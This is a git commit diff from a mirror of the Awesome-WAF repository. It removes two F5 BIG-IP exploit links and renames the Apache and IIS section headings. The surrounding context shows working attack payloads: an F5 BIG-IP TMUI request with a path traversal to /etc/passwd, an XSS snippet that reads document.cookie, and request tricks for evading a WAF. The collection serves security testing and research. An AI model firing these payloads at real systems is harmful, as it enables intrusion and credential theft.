mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2025-02-04 08:55:28 -05:00
small update to existing exploits
This commit is contained in:
parent
3cab01be56
commit
1f808549a0
@ -2575,8 +2575,6 @@ Content-Type: application/x-www-form-urlencoded
|
|||||||
|
|
||||||
_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete
|
_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete
|
||||||
```
|
```
|
||||||
- [F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure](https://www.exploit-db.com/exploits/44446) by [@0x00String](https://www.exploit-db.com/?author=7028).
|
|
||||||
- [F5 BIG-IP Remote Root Authentication Bypass Vulnerability](https://www.exploit-db.com/exploits/19091) by [@Rel1k](https://www.exploit-db.com/?author=1593).
|
|
||||||
|
|
||||||
### F5 FirePass
|
### F5 FirePass
|
||||||
- SQLi Bypass from [@Anonymous](https://www.exploit-db.com/?author=2168)
|
- SQLi Bypass from [@Anonymous](https://www.exploit-db.com/?author=2168)
|
||||||
@ -2695,7 +2693,7 @@ value="<script>alert(document.cookie)</script>">
|
|||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
### __Apache__
|
### Apache Generic
|
||||||
- Writing method type in lowercase by [@i_bo0om](http://twitter.com/i_bo0om)
|
- Writing method type in lowercase by [@i_bo0om](http://twitter.com/i_bo0om)
|
||||||
```
|
```
|
||||||
get /login HTTP/1.1
|
get /login HTTP/1.1
|
||||||
@ -2703,7 +2701,7 @@ Host: favoritewaf.com
|
|||||||
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
|
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
|
||||||
```
|
```
|
||||||
|
|
||||||
### IIS
|
### IIS Generic
|
||||||
- Tabs before method by [@i_bo0om](http://twitter.com/i_bo0om)
|
- Tabs before method by [@i_bo0om](http://twitter.com/i_bo0om)
|
||||||
```
|
```
|
||||||
GET /login.php HTTP/1.1
|
GET /login.php HTTP/1.1
|
||||||
|
Loading…
x
Reference in New Issue
Block a user